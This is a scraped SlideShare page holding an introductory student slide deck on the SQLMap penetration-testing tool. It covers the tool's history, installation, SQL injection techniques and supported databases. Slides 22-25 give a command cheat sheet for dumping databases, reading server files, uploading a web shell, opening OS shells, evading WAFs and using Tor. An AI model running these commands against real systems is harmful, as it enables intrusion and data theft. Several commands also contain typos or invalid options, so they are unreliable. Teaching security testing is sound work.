SlideShare a Scribd company logo

Sqlmap

Download as PPTX, PDF
S
SiddharthWagh7

SQLMap is an open-source penetration testing tool designed for web application security, specifically for exploiting SQL injection vulnerabilities in various database systems. It supports multiple attack techniques, offers features like database enumeration, file handling, and privilege escalation, and can be easily installed on various platforms including Kali Linux and Windows. Developed initially by Daniele Bellucci and later taken over by Bernardo Damele and Miroslav Stampar, SQLMap has gained popularity among security professionals for its comprehensive capabilities in assessing database security.

Technology
Related topics:
Ethical Hacking Courses
1 of 34
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Most read
18
Most read
19
20
21
22
Most read
23
24
25
26
27
28
29
30
31
32
33
34
SQLMAP Created By – Siddharth Wagh
An open source pentesting tool Mostly used for web applicaton pentesting An python based tool Exploits vulnerabilities in databases Supports a wide range of databases Comes pre-installed in kali linux
Bernardo Damele Bernardo took-over the sqlmap project originally developed by Daniele Bellucci, promoted and presented it at black hat Europe in 2009. Miroslav Stampar Miroslav got a call from the developers and joined the project in 2009. Miroslav and bernando released a stable version(0.8) of sqlmap in 2010.
 In windows : Before installing sqlmap we need to make sure that the system has python installed. To install python visit the link and follow the steps: https://www.python.org/downloads/ After installing python download sqlmap from the given link: https://sqlmap.org/ Follow the steps and instructions from the above link  In kali linux: sqlmap comes pre installed in kali linux. Just start the bash shell and type sqlmap  Ubuntu/other linux distros: In https://www.ma-no.org/en/security/sqlmap-installation-and-usage-in-ubuntu-and-kali-linux Follow the steps and instructions from above link  In Mac: https://macappstore.org/sqlmap/ Follow the steps and instructions from above link
Sqlmap
Sqlmap
MERCURY Standard programming database language used for relational databases MySQL, Oracle, Sybase, SQL Server, Postgre are some examples of relational databases DQL,DDL, DML, DCL are some types of statements used in SQL Developed by IBM in1970 recognized by ANSI and ISO
Ranked in top 10 vulnerabilities by OWASP Injects malicious code in database Can read, modify, execute sensitive data from the server database SQL INJECTION Web application vulnerability
Hacker Web api server Victim’s Database http://example.com?user=007 or ‘ 1=1;-- SELECT * FROM users WHERE user=001 or ‘ 1=1;-- Return the database containing all data Hacker can access all data
 Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, union query-based, stacked queries and out-of-band.  Boolean-based blind: This technique relies on sending an SQL query to the database. This query forces the application to return a boolean result(True/False), the content within the HTTP response will change, or remain the same. The result allows an attacker to decide whether the query used returns true or false, even though no data from the database are recovered.  Time-based blind: In this technique the attacker sends an query to the server to force a delay in the execution of the queries. The response time indicates whether the result is true or false.
 Error-based: This technique forces the database to generate an error, giving the attacker information that can be used to manipulate data in database.  Union-based: This technique allows an attacker to extract information from the database quickly. This attack uses the sql union operator. This attack allows the attacker to add a row to the existing database on the server.  Stacked queries: In sql a semicolon(;) is used to terminate statements. By deleting the original query and adding new the attacker can change data in the database. The semicolon allows the attacker to execute multiple statements into the database.  Out-of-band: This technique mostly depends on features being enabled on the database server being used by the web application. It occurs when an attacker is unable to use the same channel to launch the attack and gather results. This technique rely on the database server’s ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Server’s xp_dirtree command, which can be used to make DNS requests to a server an attacker controls as well as Oracle Database’s UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls.
SQLMAP supports MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, Raima Database Manager, YugabyteDB and Virtuoso database management systems.
LET’S START WITH SQLMAP
 Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.  Entirely, a range of entries or specific columns as per user's choice. The user can Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.  Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.  Support to dump database tables also choose to dump only a range of characters from each column's entry.  Support to search for specific database names, specific tables across all databases or specific columns across all databases tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.  Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
 Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.  Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.  Support for database process user privilege escalation via metasploit's meterpreter getsystem command.
Sqlmap
Sqlmap
Sqlmap
Sqlmap
Sqlmap
Sqlmap
Basic syntax: sqlmap -u URL/-r FILE --function  Get request: sqlmap -u http://example.com/page.php?id=1  Using file: sqlmap -r request.txt  Testing with pattern of URL’s: sqlmap -u http://example.com/page*/view --dbs  Post request: sqlmap -u http://example.com/login.php --data “username=admin&password=admin&submit=submit” -p username  Using cookies: sqlmap -u http://example.com /enter.php --cookie=“PHPSESSID=4582s5545gfsg77854”  Database enumaeration: sqlmap -u http://example.com/page.php?id=1 --dbs
 Identify current database: sqlmap -u http://example.com/page.php?id=1 --current-db  Extract tables: sqlmap -u http://example.com/page.php?id=1 -D database --tables  Extract columns: sqlmap -u http://example.com/page.php?id=1 -D database -T table_name --columns  Dumping data: sqlmap -u http://example.com/page.php?id=1 –D database -T table_name -C colum_names --dump  Multitreading: sqlmap -u http://example.com/page.php?id=1 --dbs --threads 5  Null-connection: sqlmap -u http://example.com/page.php?id=1 --dbs --null-connection  HTTP persistant connection: sqlmap -u http://example.com/page.php?id=1 --dbs --keep-alive  Output prediction: sqlmap -u http://example.com/page.php?id=1 -D database -T table_name -C column_names --dump –predict- output  Checking privilages: sqlmap -u http://example.com/page.php?id=1 --privileages
 Reading files from the server: sqlmap -u http://example.com/page.php?id=1 --file-read=/etc/users  Uploading files/shell: sqlmap -u http://example.com/page.php?id=1 --file-write=/root/shell.php --file-dest=/var/www/shell.php  SQL shell: sqlmap -u http://example.cpm/page.php?id=1 --sql-shell  OS shell: sqlmap -u http://example.com/page.php?id=1 --os-shell  OS command exe without shell upload: sqlmap -u http://example.com/page.php?id=1 --os-cmd “username-a”  Using proxy: sqlmap --proxy=“127.0.0.1:8080” -u http://example.com/page.php?id=1 --dbs  Using proxy with credentials: sqlmap --proxy=“127.0.0.1:8080” --proxy-cred=username:password -u http://example.com/page.php?id=1  Crawling: sqlmap -u http://example.com/ --crawl=1
 Exploitation in verbose mode: sqlmap -u http://example.com/page.php?id=1 -v 3  Bypassing WAF(web application firewall): sqlmap -u http://example.com/page.php?id=1 --tamper=apostrophemask  Scanning key based authentication page: sqlmap -u http://example.com/page.php?id=1 --auth-file=  To use default TOR network: sqlmap -u http://example.com/page.php?id=1 --tor  Scanning with high risk and level: sqlmap -u http://example.com/page.php?id=1 --level=3 --risk=5
Sqlmap
Sqlmap
Sqlmap
Sqlmap
Sqlmap
Sqlmap
 Metasploit  Acunetix  Netsparker  Intruder  Beagle Security  Appknox  Sqlninja  Detectify Deep Scan  Havij  BBQSQL  Leviathan  WhiteWidow  Jsql  Sqlmate  Pybelt
 https://sqlmap.org/  http://testphp.vulnweb.com/listproducts.php?cat=1  https://owasp.org/  https://www.g2.com/products/sqlmap/competitors/alternatives  http://example.com/page.php?id=1
Sqlmap

More Related Content

PPTX
Sqlmap
Rushikesh Kulkarni
 
PPTX
Sqlmap
shamshad9
 
PPTX
Sqlmap
Institute of Information Security (IIS)
 
PPT
SQLMAP Tool Usage - A Heads Up
Mindfire Solutions
 
PDF
Sql injection with sqlmap
Herman Duarte
 
PPT
Logstash
琛琳 饶
 
PPTX
Introduction to Malware Analysis
Andrew McNicol
 
PDF
Api security-testing
n|u - The Open Security Community
 
Sqlmap
Rushikesh Kulkarni
 
Sqlmap
shamshad9
 
Sqlmap
Institute of Information Security (IIS)
 
SQLMAP Tool Usage - A Heads Up
Mindfire Solutions
 
Sql injection with sqlmap
Herman Duarte
 
Logstash
琛琳 饶
 
Introduction to Malware Analysis
Andrew McNicol
 
Api security-testing
n|u - The Open Security Community
 

What's hot (20)

PPTX
Web Exploitation Security
Aman Singh
 
PDF
Web Application Penetration Testing
Priyanka Aash
 
PDF
VULNERABILITY ( CYBER SECURITY )
Kashyap Mandaliya
 
PPTX
SQL INJECTION
Anoop T
 
PDF
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
PPTX
Deep dive into ssrf
n|u - The Open Security Community
 
PPT
Reconnaissance & Scanning
amiable_indian
 
PPTX
Command injection
penetration Tester
 
PPTX
Practical Malware Analysis: Ch 2 Malware Analysis in Virtual Machines & 3: Ba...
Sam Bowne
 
PDF
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
Lenur Dzhemiliev
 
PPTX
Introduction to path traversal attack
Prashant Hegde
 
PPT
Bypass file upload restrictions
Mukesh k.r
 
PDF
CNIT 126 8: Debugging
Sam Bowne
 
PDF
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
PDF
Footprinting
Duah John
 
PDF
PHDays 2018 Threat Hunting Hands-On Lab
Teymur Kheirkhabarov
 
PDF
Nikto
Sorina Chirilă
 
PDF
CNIT 152: 1 Real-World Incidents
Sam Bowne
 
PPTX
Web application security
Kapil Sharma
 
PPT
Module 8 System Hacking
leminhvuong
 
Web Exploitation Security
Aman Singh
 
Web Application Penetration Testing
Priyanka Aash
 
VULNERABILITY ( CYBER SECURITY )
Kashyap Mandaliya
 
SQL INJECTION
Anoop T
 
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
Deep dive into ssrf
n|u - The Open Security Community
 
Reconnaissance & Scanning
amiable_indian
 
Command injection
penetration Tester
 
Practical Malware Analysis: Ch 2 Malware Analysis in Virtual Machines & 3: Ba...
Sam Bowne
 
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
Lenur Dzhemiliev
 
Introduction to path traversal attack
Prashant Hegde
 
Bypass file upload restrictions
Mukesh k.r
 
CNIT 126 8: Debugging
Sam Bowne
 
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
Footprinting
Duah John
 
PHDays 2018 Threat Hunting Hands-On Lab
Teymur Kheirkhabarov
 
Nikto
Sorina Chirilă
 
CNIT 152: 1 Real-World Incidents
Sam Bowne
 
Web application security
Kapil Sharma
 
Module 8 System Hacking
leminhvuong
 
Ad

Similar to Sqlmap (20)

PPTX
sqlmap- using -kali -linux by-22011556-105.pptx
NasirAli233814
 
PDF
Important SQLMap commands
zubairusman8
 
PDF
Sql injection manish file
yukta888
 
PDF
Sql Injection 0wning Enterprise
n|u - The Open Security Community
 
PPTX
Web application penetration using SQLMAP.
asmitaanpat
 
PDF
SQL Injection
Abhinav Nair
 
PPTX
SQL Injection Stegnography in Pen Testing
191013607gouthamsric
 
PPTX
eti.pptx
15SYGaneshHipparkar
 
PPT
How to Hack Website using SQL Injection Attack
Cybrary Tech
 
PDF
sqlmap internals
Miroslav Stampar
 
PDF
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Grand Parade Poland
 
PDF
Practical Approach towards SQLi ppt
Ahamed Saleem
 
PDF
Sql injection
Bee_Ware
 
PDF
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
Sam Bowne
 
PDF
Sql injection
GauthamMK
 
PPT
PHP - Introduction to Advanced SQL
Vibrant Technologies & Computers
 
PDF
SQL injection: Not only AND 1=1
Bernardo Damele A. G.
 
PPTX
Sql injection
Tech Bikram
 
PDF
Think Like a Hacker - Database Attack Vectors
Mark Ginnebaugh
 
PDF
SQL injection exploitation internals
Bernardo Damele A. G.
 
sqlmap- using -kali -linux by-22011556-105.pptx
NasirAli233814
 
Important SQLMap commands
zubairusman8
 
Sql injection manish file
yukta888
 
Sql Injection 0wning Enterprise
n|u - The Open Security Community
 
Web application penetration using SQLMAP.
asmitaanpat
 
SQL Injection
Abhinav Nair
 
SQL Injection Stegnography in Pen Testing
191013607gouthamsric
 
eti.pptx
15SYGaneshHipparkar
 
How to Hack Website using SQL Injection Attack
Cybrary Tech
 
sqlmap internals
Miroslav Stampar
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Grand Parade Poland
 
Practical Approach towards SQLi ppt
Ahamed Saleem
 
Sql injection
Bee_Ware
 
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
Sam Bowne
 
Sql injection
GauthamMK
 
PHP - Introduction to Advanced SQL
Vibrant Technologies & Computers
 
SQL injection: Not only AND 1=1
Bernardo Damele A. G.
 
Sql injection
Tech Bikram
 
Think Like a Hacker - Database Attack Vectors
Mark Ginnebaugh
 
SQL injection exploitation internals
Bernardo Damele A. G.
 
Ad

Recently uploaded (20)

PPTX
ACSFv1EN-58255 AWS Academy Cloud Security Foundations.pptx
23bcla24
 
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
PPTX
sap open course for s4hana steps from ECC to s4
sreeni2106invites
 
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Julien SIMON
 
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PPTX
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
ReZa AdineH
 
PDF
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
PDF
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
PDF
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
PPTX
Spectroscopy.pptx food analysis technology
nawahassan45
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
ACSFv1EN-58255 AWS Academy Cloud Security Foundations.pptx
23bcla24
 
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
sap open course for s4hana steps from ECC to s4
sreeni2106invites
 
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
Encapsulation theory and applications.pdf
gurumoop
 
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Julien SIMON
 
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
ReZa AdineH
 
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
Spectroscopy.pptx food analysis technology
nawahassan45
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 

Sqlmap

  • 1. SQLMAP Created By – Siddharth Wagh
  • 2. An open source pentesting tool Mostly used for web applicaton pentesting An python based tool Exploits vulnerabilities in databases Supports a wide range of databases Comes pre-installed in kali linux
  • 3. Bernardo Damele Bernardo took-over the sqlmap project originally developed by Daniele Bellucci, promoted and presented it at black hat Europe in 2009. Miroslav Stampar Miroslav got a call from the developers and joined the project in 2009. Miroslav and bernando released a stable version(0.8) of sqlmap in 2010.
  • 4.  In windows : Before installing sqlmap we need to make sure that the system has python installed. To install python visit the link and follow the steps: https://www.python.org/downloads/ After installing python download sqlmap from the given link: https://sqlmap.org/ Follow the steps and instructions from the above link  In kali linux: sqlmap comes pre installed in kali linux. Just start the bash shell and type sqlmap  Ubuntu/other linux distros: In https://www.ma-no.org/en/security/sqlmap-installation-and-usage-in-ubuntu-and-kali-linux Follow the steps and instructions from above link  In Mac: https://macappstore.org/sqlmap/ Follow the steps and instructions from above link
  • 7. MERCURY Standard programming database language used for relational databases MySQL, Oracle, Sybase, SQL Server, Postgre are some examples of relational databases DQL,DDL, DML, DCL are some types of statements used in SQL Developed by IBM in1970 recognized by ANSI and ISO
  • 8. Ranked in top 10 vulnerabilities by OWASP Injects malicious code in database Can read, modify, execute sensitive data from the server database SQL INJECTION Web application vulnerability
  • 9. Hacker Web api server Victim’s Database http://example.com?user=007 or ‘ 1=1;-- SELECT * FROM users WHERE user=001 or ‘ 1=1;-- Return the database containing all data Hacker can access all data
  • 10.  Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, union query-based, stacked queries and out-of-band.  Boolean-based blind: This technique relies on sending an SQL query to the database. This query forces the application to return a boolean result(True/False), the content within the HTTP response will change, or remain the same. The result allows an attacker to decide whether the query used returns true or false, even though no data from the database are recovered.  Time-based blind: In this technique the attacker sends an query to the server to force a delay in the execution of the queries. The response time indicates whether the result is true or false.
  • 11.  Error-based: This technique forces the database to generate an error, giving the attacker information that can be used to manipulate data in database.  Union-based: This technique allows an attacker to extract information from the database quickly. This attack uses the sql union operator. This attack allows the attacker to add a row to the existing database on the server.  Stacked queries: In sql a semicolon(;) is used to terminate statements. By deleting the original query and adding new the attacker can change data in the database. The semicolon allows the attacker to execute multiple statements into the database.  Out-of-band: This technique mostly depends on features being enabled on the database server being used by the web application. It occurs when an attacker is unable to use the same channel to launch the attack and gather results. This technique rely on the database server’s ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Server’s xp_dirtree command, which can be used to make DNS requests to a server an attacker controls as well as Oracle Database’s UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls.
  • 12. SQLMAP supports MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, Raima Database Manager, YugabyteDB and Virtuoso database management systems.
  • 14.  Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.  Entirely, a range of entries or specific columns as per user's choice. The user can Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.  Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.  Support to dump database tables also choose to dump only a range of characters from each column's entry.  Support to search for specific database names, specific tables across all databases or specific columns across all databases tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.  Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • 15.  Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.  Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.  Support for database process user privilege escalation via metasploit's meterpreter getsystem command.
  • 22. Basic syntax: sqlmap -u URL/-r FILE --function  Get request: sqlmap -u http://example.com/page.php?id=1  Using file: sqlmap -r request.txt  Testing with pattern of URL’s: sqlmap -u http://example.com/page*/view --dbs  Post request: sqlmap -u http://example.com/login.php --data “username=admin&password=admin&submit=submit” -p username  Using cookies: sqlmap -u http://example.com /enter.php --cookie=“PHPSESSID=4582s5545gfsg77854”  Database enumaeration: sqlmap -u http://example.com/page.php?id=1 --dbs
  • 23.  Identify current database: sqlmap -u http://example.com/page.php?id=1 --current-db  Extract tables: sqlmap -u http://example.com/page.php?id=1 -D database --tables  Extract columns: sqlmap -u http://example.com/page.php?id=1 -D database -T table_name --columns  Dumping data: sqlmap -u http://example.com/page.php?id=1 –D database -T table_name -C colum_names --dump  Multitreading: sqlmap -u http://example.com/page.php?id=1 --dbs --threads 5  Null-connection: sqlmap -u http://example.com/page.php?id=1 --dbs --null-connection  HTTP persistant connection: sqlmap -u http://example.com/page.php?id=1 --dbs --keep-alive  Output prediction: sqlmap -u http://example.com/page.php?id=1 -D database -T table_name -C column_names --dump –predict- output  Checking privilages: sqlmap -u http://example.com/page.php?id=1 --privileages
  • 24.  Reading files from the server: sqlmap -u http://example.com/page.php?id=1 --file-read=/etc/users  Uploading files/shell: sqlmap -u http://example.com/page.php?id=1 --file-write=/root/shell.php --file-dest=/var/www/shell.php  SQL shell: sqlmap -u http://example.cpm/page.php?id=1 --sql-shell  OS shell: sqlmap -u http://example.com/page.php?id=1 --os-shell  OS command exe without shell upload: sqlmap -u http://example.com/page.php?id=1 --os-cmd “username-a”  Using proxy: sqlmap --proxy=“127.0.0.1:8080” -u http://example.com/page.php?id=1 --dbs  Using proxy with credentials: sqlmap --proxy=“127.0.0.1:8080” --proxy-cred=username:password -u http://example.com/page.php?id=1  Crawling: sqlmap -u http://example.com/ --crawl=1
  • 25.  Exploitation in verbose mode: sqlmap -u http://example.com/page.php?id=1 -v 3  Bypassing WAF(web application firewall): sqlmap -u http://example.com/page.php?id=1 --tamper=apostrophemask  Scanning key based authentication page: sqlmap -u http://example.com/page.php?id=1 --auth-file=  To use default TOR network: sqlmap -u http://example.com/page.php?id=1 --tor  Scanning with high risk and level: sqlmap -u http://example.com/page.php?id=1 --level=3 --risk=5
  • 32.  Metasploit  Acunetix  Netsparker  Intruder  Beagle Security  Appknox  Sqlninja  Detectify Deep Scan  Havij  BBQSQL  Leviathan  WhiteWidow  Jsql  Sqlmate  Pybelt
  • 33.  https://sqlmap.org/  http://testphp.vulnweb.com/listproducts.php?cat=1  https://owasp.org/  https://www.g2.com/products/sqlmap/competitors/alternatives  http://example.com/page.php?id=1